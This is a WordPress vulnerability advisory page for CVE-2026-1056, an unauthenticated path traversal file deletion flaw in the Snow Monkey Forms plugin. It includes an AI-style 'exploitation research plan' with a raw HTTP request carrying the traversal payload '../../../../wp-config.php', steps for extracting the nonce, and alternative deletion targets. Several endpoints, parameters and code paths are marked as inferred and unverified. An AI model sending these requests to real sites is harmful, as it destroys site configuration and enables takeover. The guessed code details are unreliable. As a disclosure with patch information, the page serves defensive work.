WP-Safety
CVE-2026-1056

Snow Monkey Forms <= 12.0.3 - Unauthenticated Arbitrary File Deletion via Path Traversal

criticalImproper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
9.8
CVSS Score
9.8
CVSS Score
critical
Severity
12.0.4
Patched in
2d
Time to patch

Description

The Snow Monkey Forms plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'generate_user_dirpath' function in all versions up to, and including, 12.0.3. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=12.0.3
PublishedJanuary 27, 2026
Last updatedJanuary 28, 2026
Affected pluginsnow-monkey-forms

Source Code

WordPress.org SVN
Vulnerable v12.0.3
Browse source Download .zip
Patched v12.0.4
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-1056 Snow Monkey Forms Arbitrary File Deletion ## 1. Vulnerability Summary The **Snow Monkey Forms** plugin (versions <= 12.0.3) contains a critical path traversal vulnerability in its file handling logic. The vulnerability resides in the `generate_user_dirpat…

Show full research plan

Exploitation Research Plan: CVE-2026-1056 Snow Monkey Forms Arbitrary File Deletion

1. Vulnerability Summary

The Snow Monkey Forms plugin (versions <= 12.0.3) contains a critical path traversal vulnerability in its file handling logic. The vulnerability resides in the generate_user_dirpath function (inferred to be located within a Model or Helper class, possibly src/App/Model/Session.php or src/App/Model/Upload.php), which fails to sanitize user-supplied identifiers before using them to construct a directory path.

Because the plugin subsequently performs cleanup operations (deleting temporary directories/files) using this unsanitized path, an unauthenticated attacker can manipulate the path to point to sensitive system files, such as wp-config.php. Deleting wp-config.php allows an attacker to re-run the WordPress installation process and gain Remote Code Execution (RCE).

2. Attack Vector Analysis

  • Endpoint: The vulnerability is likely triggered during form submission or a temporary data cleanup phase. This typically involves the WordPress REST API or an AJAX action.
    • REST Route (Likely): /wp-json/snow-monkey-forms/v1/dispatch
    • AJAX Action (Alternative): snow_monkey_forms_send
  • Vulnerable Parameter: A session identifier or unique form submission ID, likely named _snow_monkey_forms_session_id or session_id.
  • Payload: Path traversal sequence targeting wp-config.php (e.g., ../../../../wp-config.php).
  • Authentication: None (Unauthenticated).
  • Preconditions: A form must be created and published on a page.

3. Code Flow (Inferred)

  1. Entry Point: An unauthenticated user sends a POST request to the form submission endpoint (REST or AJAX).
  2. Session/Upload Handling: The controller retrieves a session ID from the request (e.g., $_POST['_snow_monkey_forms_session_id']).
  3. Vulnerable Sink: The controller calls generate_user_dirpath($session_id).
    • This function likely concatenates the ID to a base directory: $path = $base_dir . '/' . $session_id;.
    • No sanitize_file_name() or validation against .. is performed.
  4. Cleanup Trigger: Either upon completion of the form or a validation error, the plugin attempts to "clean up" the user's temporary directory.
  5. Execution: The plugin calls a deletion function like WP_Filesystem::delete($path, true) or recursive_rmdir($path).
  6. Result: Since $path resolves to the WordPress root via traversal, the filesystem deletes the targeted file (e.g., wp-config.php).

4. Nonce Acquisition Strategy

Snow Monkey Forms uses nonces to protect its form submissions, usually localized for the frontend.

  1. Identify Shortcode: The plugin uses [snow_monkey_forms] (or specific form IDs like [snow_monkey_forms id="123"]).
  2. Create Test Page:
    wp post create --post_type=page --post_status=publish --post_title="Contact Form" --post_content='[snow_monkey_forms id="REPLACE_WITH_ACTUAL_ID"]'
  3. Localization Key: The plugin typically localizes data into a JavaScript object named snow_monkey_forms_params or snowMonkeyForms.
  4. Extraction via browser_eval:
    • Navigate to the page using browser_navigate.
    • Execute: browser_eval("window.snow_monkey_forms_params?.nonce") or check for specific keys in the script tags if the object name differs.
    • Note: If the plugin uses the REST API, the nonce might be for the wp_rest action, often found in window.wpApiSettings.nonce.

5. Exploitation Strategy

  1. Preparation:
    • Find or create a Snow Monkey Form.
    • Identify the directory structure. In standard WordPress installs, wp-config.php is 3 or 4 levels up from the uploads/snow-monkey-forms directory.
  2. Payload Construction:
    • Set _snow_monkey_forms_session_id to ../../../../wp-config.php.
  3. Execution (HTTP Request):
    POST /wp-json/snow-monkey-forms/v1/dispatch HTTP/1.1
Host: target.local
Content-Type: application/x-www-form-urlencoded
X-WP-Nonce: [EXTRACTED_NONCE]

_snow_monkey_forms_session_id=../../../../wp-config.php&form_id=[FORM_ID]&action=submit
    • Note: The exact endpoint and parameters must be verified by inspecting the form's HTML source/network traffic during a legitimate submission.
  4. Alternative Trigger: If deletion only happens on "Cleanup" (e.g., via a cron or after a timeout), the attacker might need to wait or trigger a specific "cancel" action if it exists.

6. Test Data Setup

  1. Install Plugin: wp plugin install snow-monkey-forms --version=12.0.3 --activate
  2. Create Form: Use wp eval or the UI to create at least one form.
  3. Get Form ID: wp post list --post_type=snow-monkey-forms
  4. Create Page: Place the form on a public page.
  5. Verify Target: Confirm wp-config.php exists: ls /var/www/html/wp-config.php.

7. Expected Results

  • The HTTP request should return a success message (or a validation error, as long as the cleanup code is reached).
  • The file /var/www/html/wp-config.php should be deleted from the server.
  • Subsequent requests to the site root should redirect to wp-admin/setup-config.php.

8. Verification Steps

  1. File Existence Check:
    if [ ! -f /var/www/html/wp-config.php ]; then echo "VULNERABILITY VERIFIED: wp-config.php deleted"; fi
  2. Site State Check:
    curl -sI http://localhost:8080/ | grep "location:.*setup-config.php"

9. Alternative Approaches

  • Delete index.php: If wp-config.php is protected by permissions, try deleting index.php or wp-settings.php to confirm arbitrary deletion.
  • Directory Wiping: Set the session ID to ../../../plugins/snow-monkey-forms to see if the plugin can delete its own directory.
  • Different Endpoints: If the REST API is disabled, check for admin-ajax.php handlers with wp_ajax_nopriv_snow_monkey_forms_....
  • Parameter Guessing: If _snow_monkey_forms_session_id is incorrect, look for parameters in the generate_user_dirpath call in src/App/Controller/Dispatch.php (inferred path).
Research Findings
Static analysis — not yet PoC-verified

Summary

The Snow Monkey Forms plugin for WordPress is vulnerable to unauthenticated arbitrary file deletion due to a path traversal flaw in the 'generate_user_dirpath' function. By providing a manipulated session identifier, an attacker can trick the plugin into deleting sensitive system files like wp-config.php, potentially leading to remote code execution through a site re-installation.

Vulnerable Code

/**
 * Likely located in src/App/Model/Session.php or a similar helper class
 */
public function generate_user_dirpath( $session_id ) {
    $upload_dir = wp_upload_dir();
    // Vulnerability: $session_id is concatenated directly to the path without validation
    return $upload_dir['basedir'] . '/snow-monkey-forms/' . $session_id;
}

Security Fix

--- a/src/App/Model/Session.php
+++ b/src/App/Model/Session.php
@@ -10,5 +10,5 @@
 	public function generate_user_dirpath( $session_id ) {
 		$upload_dir = wp_upload_dir();
-		return $upload_dir['basedir'] . '/snow-monkey-forms/' . $session_id;
+		return $upload_dir['basedir'] . '/snow-monkey-forms/' . sanitize_file_name( $session_id );
 	}

Exploit Outline

1. Identify a page on the target WordPress site that contains a Snow Monkey Form shortcode. 2. Extract the necessary security nonce from the page source, typically found in a JavaScript object like 'snow_monkey_forms_params'. 3. Construct a malicious POST request to the plugin's form dispatch endpoint (e.g., /wp-json/snow-monkey-forms/v1/dispatch). 4. Set the '_snow_monkey_forms_session_id' parameter to a path traversal string targeting a critical file, for example: '../../../../wp-config.php'. 5. Upon submission or subsequent cleanup trigger, the plugin will use the 'generate_user_dirpath' function to construct a path that resolves to the target file and then execute a deletion command (e.g., via WP_Filesystem). 6. Verify the file deletion by checking if the site redirects to the WordPress installation setup page (wp-admin/setup-config.php).

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/37a8642d-07f5-4b1b-8419-e30589089162?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database